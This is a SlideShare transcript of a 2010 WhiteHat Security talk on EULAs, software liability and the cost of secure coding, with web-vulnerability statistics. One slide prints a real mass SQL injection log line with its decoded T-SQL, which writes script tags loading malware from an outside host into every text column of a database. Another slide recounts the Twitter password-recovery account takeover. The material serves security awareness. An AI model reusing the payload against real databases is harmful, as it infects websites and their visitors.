Loading…

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

Like this document? Why not share!

Like this? Share it with your network

Share

State of the EULA -- "Who pays for Secure Code?"

on

  • 1,052 views

What are the business and societal implications of requiring secure coding practices to be implemented in the software industry? Would it affect you or your organization? How would it change the ...

What are the business and societal implications of requiring secure coding practices to be implemented in the software industry? Would it affect you or your organization? How would it change the landscape of our industry, our legal system, and our wallets? Why don't developers write it now?

How did the system get the way it did and how will it change in the future? In this talk, we strive to come up with the answers. Bring your best ideas. Let's talk.

Nick Schilbe, WhiteHat Security

Nick Schilbe is a Security Engineering Supervisor at WhiteHat Security, leading a team of security engineers who manage WhiteHat Sentinel, the company’s SaaS-based website vulnerability management service. Mr. Schilbe develops, refines and implements new processes and workflows for the WhiteHat Sentinel family of website risk management solutions. His WhiteHat Security Engineering team provides service to more than 500 production e-commerce, financial services and healthcare websites, including many Fortune 500 companies.

Statistics

Views

Total Views
1,052
Views on SlideShare
1,052
Embed Views
0

Actions

Likes
0
Downloads
12
Comments
1

0 Embeds 0

No embeds

Accessibility

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

State of the EULA -- "Who pays for Secure Code?" Document Transcript

  • 1. State of the EULA Who pays for Secure Code? Joshua Marpet Security Solutions Specialist 5.1.2010 © 2010 WhiteHat, Inc. Wednesday, May 12, 2010
  • 2. Definitions Secure Software - • software that is written so as to preclude the possibility of syntactical or technical attacks. • software written using a secure framework • software executed behind a Secure Framework appliance EULA - End User License Agreement • End User License Agreement - A software license agreement is a contract between the "licensor" and purchaser of the right to use software. The license may define ways under which the copy can be used, in addition to the automatic rights of the buyer including the first sale doctrine and 17 U.S.C. § 117 (freedom to use, archive, re-sale, and backup). • Many form contracts are only contained in digital form, and only presented to a user as a click-through where the user must "accept". As the user may not see the agreement until after he or she has already purchased the software, these documents may be contracts of adhesion. These documents often call themselves end-user license agreements (EULAs). © 2010 WhiteHat, Inc. | Page 2 Wednesday, May 12, 2010 Reason Because they can To Hold Harmless To circumvent copyright law to extend copyright where it is prohibited
  • 3. Anti-Terrorism Eula You agree ... development, design ... production of missiles, or nuclear, chemical or biological weapons. iTunes? Nukes? Srsly? © 2009 WhiteHat, Inc. | Page 3 Wednesday, May 12, 2010
  • 4. © 2009 WhiteHat, Inc. | Page 4 Wednesday, May 12, 2010
  • 5. “Do not taunt happy fun ball” Srsly?? © 2009 WhiteHat, Inc. | Page 5 Wednesday, May 12, 2010
  • 6. © 2009 WhiteHat, Inc. | Page 6 Wednesday, May 12, 2010
  • 7. SDLC Software Development Life Cycle © 2009 WhiteHat, Inc. | Page 7 Wednesday, May 12, 2010 Why do we need EULA’s? Because of the SDLC.
  • 8. SDLC Software Development Life Cycle Do you see the word © 2009 WhiteHat, Inc. | Page 7 Wednesday, May 12, 2010 Why do we need EULA’s? Because of the SDLC.
  • 9. SDLC Software Development Life Cycle Do you see the word Security? © 2009 WhiteHat, Inc. | Page 7 Wednesday, May 12, 2010 Why do we need EULA’s? Because of the SDLC.
  • 10. SDLC Software Development Life Cycle Do you see the word Security? © 2009 WhiteHat, Inc. | Page 7 Wednesday, May 12, 2010 Why do we need EULA’s? Because of the SDLC.
  • 11. Implicit Security © 2009 WhiteHat, Inc. | Page 8 Wednesday, May 12, 2010 How is this different from say, a car? Your car has the capability to do great damage to people or property. Where does the liability lie if that damage occurs? Driver Licensing Insurance Laws Police to ensure laws are followed Road Engineering to make it harder to get in wrecks Manufacturer IF auto is found to be defective LARGE liability Firestone Tires Toyota Gas Pedal/carpet/computer/whatever! NHTSA crash ratings huge insurance policies to offset
  • 12. Implicit Security © 2009 WhiteHat, Inc. | Page 8 Wednesday, May 12, 2010 How is this different from say, a car? Your car has the capability to do great damage to people or property. Where does the liability lie if that damage occurs? Driver Licensing Insurance Laws Police to ensure laws are followed Road Engineering to make it harder to get in wrecks Manufacturer IF auto is found to be defective LARGE liability Firestone Tires Toyota Gas Pedal/carpet/computer/whatever! NHTSA crash ratings huge insurance policies to offset
  • 13. Implicit Security © 2009 WhiteHat, Inc. | Page 8 Wednesday, May 12, 2010 How is this different from say, a car? Your car has the capability to do great damage to people or property. Where does the liability lie if that damage occurs? Driver Licensing Insurance Laws Police to ensure laws are followed Road Engineering to make it harder to get in wrecks Manufacturer IF auto is found to be defective LARGE liability Firestone Tires Toyota Gas Pedal/carpet/computer/whatever! NHTSA crash ratings huge insurance policies to offset
  • 14. Implicit Security © 2009 WhiteHat, Inc. | Page 8 Wednesday, May 12, 2010 How is this different from say, a car? Your car has the capability to do great damage to people or property. Where does the liability lie if that damage occurs? Driver Licensing Insurance Laws Police to ensure laws are followed Road Engineering to make it harder to get in wrecks Manufacturer IF auto is found to be defective LARGE liability Firestone Tires Toyota Gas Pedal/carpet/computer/whatever! NHTSA crash ratings huge insurance policies to offset
  • 15. © 2009 WhiteHat, Inc. | Page 9 Wednesday, May 12, 2010 Software security is Explicit. It must be specified by the person or company commissioning the software. Automobile Security is IMPLICIT - built into the automobile design process, mandated by various regulatory agencies, and incentivized by insurance companies who DON't want to pay out on huge claims from owners and manufacturer's alike.
  • 16. Explicit Results © 2009 WhiteHat, Inc. | Page 10 Wednesday, May 12, 2010 Consumer-software they bought is not built implicitly secure. keep track of security patches for the software I own purchase 3rd party means to protect computer from:malicious internet based software. Random Worms, Trojans, Viruses, etc. Companies -if used in productions environments, they take on liability
  • 17. Secure Code = ? © 2009 WhiteHat, Inc. | Page 11 Wednesday, May 12, 2010 Why is Secure Code Explicit? Money. Developers receive no extra money to write secure code. As a matter of fact, they are actually penalized. Development teams are on deadlines for functional code, not secure functional code. Taking the time to write secure code will take away from the time needed to get the functionality, user interface (UI), documentation, etc, done.
  • 18. Dev Team Ramifications © 2009 WhiteHat, Inc. | Page 12 Wednesday, May 12, 2010 What would happen to individual developers, or small dev teams if security was IMPLICIT? The days of agile development, and small teams coming up with widgets or "apps" would be over. The equivalent of malpractice insurance would simply be setting the bar too high for individuals or small teams to get over, much as it is in the auto or plane industry today. (Mind you, I'm not suggesting we should change the auto or plane industry, just making a comparison.)
  • 19. Open Source? © 2009 WhiteHat, Inc. | Page 13 Wednesday, May 12, 2010 What about open source software? If we keep the comparisons going, it would fit into much the same idea as "X" or experimental planes are in, or hot rods, in the car industry. So long as it meets some reasonable definition of safety, you can get insurance. That insurance will be with very much smaller claim limits, and it will cover a lot fewer categories of problems, but if you choose to have that experimental plane or hot rod car, that's the explicit choice you make. If you choose to go with open source software, you save on up front costs, but you have explicitly made a choice to have software without implicit support.
  • 20. Open Source? © 2009 WhiteHat, Inc. | Page 13 Wednesday, May 12, 2010 What about open source software? If we keep the comparisons going, it would fit into much the same idea as "X" or experimental planes are in, or hot rods, in the car industry. So long as it meets some reasonable definition of safety, you can get insurance. That insurance will be with very much smaller claim limits, and it will cover a lot fewer categories of problems, but if you choose to have that experimental plane or hot rod car, that's the explicit choice you make. If you choose to go with open source software, you save on up front costs, but you have explicitly made a choice to have software without implicit support.
  • 21. Open Source? © 2009 WhiteHat, Inc. | Page 13 Wednesday, May 12, 2010 What about open source software? If we keep the comparisons going, it would fit into much the same idea as "X" or experimental planes are in, or hot rods, in the car industry. So long as it meets some reasonable definition of safety, you can get insurance. That insurance will be with very much smaller claim limits, and it will cover a lot fewer categories of problems, but if you choose to have that experimental plane or hot rod car, that's the explicit choice you make. If you choose to go with open source software, you save on up front costs, but you have explicitly made a choice to have software without implicit support.
  • 22. Marketability © 2009 WhiteHat, Inc. | Page 14 Wednesday, May 12, 2010 There's also the marketability of developer skills. As a developer, would you rather have Java, .NET, and C# on your resume, or MyKonos, which although good, no one has heard of.
  • 23. Secure Code = ? Extra Testing! © 2009 WhiteHat, Inc. | Page 15 Wednesday, May 12, 2010 So what would happen if we got rid of the EULA? If it was decreed that code HAS to be secure, out of the gate? We would quickly have problems finding developers who know how to code securely. But that can be fixed via using secure frameworks, secure code appliances, and/or a heck of a lot of developer education. Once that problem was solved, the cost of software would rise dramatically. Testing would become an onerous burden on dev teams, as every revision of code would require full rounds of QA, regression testing, unit testing, etc. This is besides the extra time (read money) it would take to write the initial code as secure.
  • 24. Secure Code = ? Extra Testing! © 2009 WhiteHat, Inc. | Page 15 Wednesday, May 12, 2010 So what would happen if we got rid of the EULA? If it was decreed that code HAS to be secure, out of the gate? We would quickly have problems finding developers who know how to code securely. But that can be fixed via using secure frameworks, secure code appliances, and/or a heck of a lot of developer education. Once that problem was solved, the cost of software would rise dramatically. Testing would become an onerous burden on dev teams, as every revision of code would require full rounds of QA, regression testing, unit testing, etc. This is besides the extra time (read money) it would take to write the initial code as secure.
  • 25. Secure Framework-MyKonos © 2009 WhiteHat, Inc. | Page 16 Wednesday, May 12, 2010 Example of a secure framework, and a secure code appliance. (similar to a WAF, but not as widely known)
  • 26. Top Ten Web Hacking Techniques (2009) MUST be able to protect against MUST be able to protect against HOSTILE WEB USER HOSTILE WEB PAGE © 2010 WhiteHat, Inc. | Page 17 Wednesday, May 12, 2010
  • 27. Website Classes of Attacks © 2009 WhiteHat, Inc. | Page 18 Wednesday, May 12, 2010
  • 28. Website Classes of Attacks Technical: Automation Can Identify Command Execution • Buffer Overflow • Format String Attack • LDAP Injection • OS Commanding • SQL Injection • SSI Injection • XPath Injection Information Disclosure • Directory Indexing • Information Leakage • Path Traversal • Predictable Resource Location Client-Side • Content Spoofing • Cross-site Scripting • HTTP Response Splitting* © 2009 WhiteHat, Inc. | Page 18 Wednesday, May 12, 2010
  • 29. Website Classes of Attacks Technical: Automation Can Identify Business Logic: Humans Required Command Execution Authentication • Buffer Overflow • Brute Force • Format String Attack • Insufficient Authentication • LDAP Injection • Weak Password Recovery Validation • OS Commanding • CSRF* • SQL Injection • SSI Injection Authorization • XPath Injection • Credential/Session Prediction • Insufficient Authorization Information Disclosure • Insufficient Session Expiration • Directory Indexing • Session Fixation • Information Leakage • Path Traversal Logical Attacks • Predictable Resource Location • Abuse of Functionality • Denial of Service Client-Side • Insufficient Anti-automation • Content Spoofing • Insufficient Process Validation • Cross-site Scripting • HTTP Response Splitting* © 2009 WhiteHat, Inc. | Page 18 Wednesday, May 12, 2010
  • 30. © 2009 WhiteHat, Inc. | Page 19 Wednesday, May 12, 2010
  • 31. © 2009 WhiteHat, Inc. | Page 20 Wednesday, May 12, 2010
  • 32. http://blogs.apache.org/infra/entry/apache_org_04_09_2010 © 2009 WhiteHat, Inc. | Page 21 Wednesday, May 12, 2010
  • 33. Mass SQL Injection • Generic SQL Injection populates databases with malicious JavaScript IFRAMEs •(Millions of websites sites infected - more every day) • Visitors arrive and their browser auto-connects to a malware server infecting their machine with trojans -- or the website is damaged and can no longer conduct business. • Botnets form then continue SQL injecting websites • Infected sites risk becoming blacklisted on search engines and Web filtering gateways causing loss of visitors Random Opportunistic © 2009 WhiteHat, Inc. | Page 22 Wednesday, May 12, 2010
  • 34. "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast (0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5 220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973 6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6 22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39 39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206 22E78747970653D31363729204F50454E205461626C655F437572736F722046455443 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4 043205748494C4528404046455443485F5354415455533D302920424547494E206578 65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2 72B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874 74703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736 3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520 272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F736 46F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C 212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736 F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F 72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000)); EXEC(@S); HTTP/1.1" 200 6338 "-" Decoded... DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo. 1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor © 2009 WhiteHat, Inc. | Page 23 Wednesday, May 12, 2010
  • 35. Fully Targeted Hacker 1 Albert "Segvec" Gonzalez Victims Techniques TJ Maxx SQL Injection Barnes & Noble Sniffers BJ’s Wholesale Wireless Security / War Driving Boston Market Shared Passwords Hacker 2 DSW Shoe Warehouse Malware Forever 21 Anti-Forensics Office Max Backdoors Sports Authority Social Engineering Heartland Payment Systems Hannaford Brothers 7-Eleven Dave and Busters http://www.wired.com/threatlevel/2009/08/tjx-hacker-charged-with-heartland/ http://government.zdnet.com/?p=5242 http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech Wednesday, May 12, 2010
  • 36. Twitter Hacker http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25 Wednesday, May 12, 2010
  • 37. Twitter Hacker Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com. http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25 Wednesday, May 12, 2010
  • 38. Twitter Hacker Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com. Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo. http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25 Wednesday, May 12, 2010
  • 39. Twitter Hacker Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com. Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo. Pilfers inbox for passwords to other Web services, sets the Gmail password to the original so employee would not notice. http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25 Wednesday, May 12, 2010
  • 40. Twitter Hacker Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com. Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo. Pilfers inbox for passwords to other Web services, sets the Gmail password to the original so employee would not notice. Used the same password to compromise employee's email on Google Apps, steal hundreds of internal documents, and Owned! access Twitter's domains at GoDaddy. Sent to TechCrunch. http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25 Wednesday, May 12, 2010
  • 41. Twitter Hacker Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com. Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo. Pilfers inbox for passwords to other Web services, sets the Gmail password to the original so employee would not notice. Used the same password to compromise employee's email on Google Apps, steal hundreds of internal documents, and Owned! access Twitter's domains at GoDaddy. Sent to TechCrunch. Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using username/passwords and password recovery systems. http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25 Wednesday, May 12, 2010
  • 42. Twitter Hacker Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com. Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo. Pilfers inbox for passwords to other Web services, sets the Gmail password to the original so employee would not notice. Used the same password to compromise employee's email on Google Apps, steal hundreds of internal documents, and Owned! access Twitter's domains at GoDaddy. Sent to TechCrunch. Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using username/passwords and password recovery systems. “I’m sorry” - Hacker Croll http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25 Wednesday, May 12, 2010
  • 43. Business Goals & Budget Justification Risk Mitigation "If we spend $X on Y, we’ll reduce risk of loss of $A by B%." Due Diligence "We must spend $X on Y because it’s an industry best-practice." Incident Response "We must spend $X on Y so that Z never happens again." Regulatory Compliance "We must spend $X on Y because <insert regulation> says so." Competitive Advantage "We must spend $X on Y to make the customer happy." © 2009 WhiteHat, Inc. | Page 26 Wednesday, May 12, 2010
  • 44. WhiteHat Security Top Ten Percentage likelihood of a website having a vulnerability by class Cross-Site Scripting 65% Information Leakage Content Spoofing Insufficient Authorization SQL Injection Predictable Resource Location 47% Session Fixation Cross-Site Request Forgery Insufficient Authentication HTTP Response Splitting 30% 18% 17% 14% 9% 11% 11% 10% © 2009 WhiteHat, Inc. | Page 27 Wednesday, May 12, 2010
  • 45. Time-to-Fix (Days) Cross-Site Scripting 58 Information Leakage 85 Content Spoofing 71 Insufficient Authorization 72 SQL Injection 38 Predictable Resource Location 79 Session Fixation 104 Cross-Site Request Forgery 56 Insufficient Authentication 125 HTTP Response Splitting 80 Best-case scenario: Not all vulnerabilities have been fixed... © 2009 WhiteHat, Inc. | Page 28 Wednesday, May 12, 2010
  • 46. Resolution Rate - By Class Class of Attack % resolved severity Cross Site Scripting 20% urgent Insufficient Authorization 19% urgent SQL Injection 30% urgent HTTP Response Splitting 75% urgent Directory Traversal 53% urgent Insufficient Authentication 38% critical Cross-Site Scripting 39% critical Abuse of Functionality 28% critical Cross-Site Request Forgery 45% critical Session Fixation 21% critical Brute Force 11% high Content Spoofing 25% high HTTP Response Splitting 30% high Information Leakage 29% high Predictable Resource Location 26% high © 2009 WhiteHat, Inc. | Page 29 Wednesday, May 12, 2010
  • 47. © 2009 WhiteHat, Inc. | Page 30 Wednesday, May 12, 2010
  • 48. How the breach was detected: • 3rd party detection due to FRAUD (55%) • 3rd party detection NOT due to fraud (15%) • Employee Discovery (13%) • Unusual System Performance (11%) http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/ Wednesday, May 12, 2010
  • 49. http://www.zdnet.com.au/mcafee-clients-do-you-have-the-guts-339302660.htm?omnRef=http%3A%2F %2Fwww.zdnet.com.au%2Fmcafee-clients-do-you-have-the-guts-339302660.htm © 2009 WhiteHat, Inc. | Page 32 Wednesday, May 12, 2010 So which would you rather have? Software with Implicit security, and the corresponding high bar to entry, with mal-dev insurance policies and government agencies mandating security practices? Or software without implicit security, and the EULA of the Damned?
  • 50. References/Organizations OWASP - Open Web Application Security Project http://www.owasp.org • Webgoat - VM’s with Vulns to hack • Webscarab - Proxy to see how hackers work • Multiple other projects! • Join! It’s free! WASC - Web Application Security Consortium http://www.webappsec.org • TC V2 - http://projects.webappsec.org/Threat-Classification © 2009 WhiteHat, Inc. | Page 33 Wednesday, May 12, 2010
  • 51. Thank You! Joshua Marpet Security Solutions Specialist Joshua.Marpet@whitehatsec.com Jeremiah Grossman Blog: http://jeremiahgrossman.blogspot.com/ WhiteHat Security http://www.whitehatsec.com/ © 2010 WhiteHat, Inc. Wednesday, May 12, 2010